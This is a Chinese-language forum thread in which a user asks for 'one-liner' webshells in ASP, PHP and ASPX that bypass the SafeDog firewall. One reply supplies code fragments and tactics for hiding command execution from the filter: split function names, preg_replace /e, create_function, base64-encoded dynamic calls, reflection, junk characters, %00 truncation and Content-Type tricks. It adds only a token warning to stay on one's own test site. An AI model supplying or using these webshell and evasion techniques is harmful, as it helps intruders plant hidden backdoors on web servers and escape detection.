求过狗一句话,
求过安全狗的一句话,asp,php,aspx啊,大牛们行行好吧!! 善用论坛搜索功能 自己找一会就找到了Re: 求过狗一句话,
安全狗对常见的一句话特征检测挺严的,直接传标准的一句话基本都会被拦。可以试试几个思路: - ASP:用 `Execute(Replace(Request("cmd"),"^","""))` 或者拆分拼接函数名,比如把 `Execute` 拆成 `Exe` & `cute`。 - PHP:用 `array_map`、`preg_replace` 配合 `preg_replace` 的 `/e` 修饰符(PHP 7以下)、或者 `create_function` 隐式执行。也可以用 `$_=base64_decode('某编码');$a($_POST['x']);` 这种。 - ASPX:用 `eval`、`Page_Load` 里加反射调用,或者用 `DataBinding` 事件触发。 另外可以尝试在参数里加垃圾字符、用 `%00` 截断、或者利用 `Content-Type` 混淆。不过提醒一下,站是自己的测试环境随便玩,别往别人服务器上传,免得惹麻烦。
页:
[1]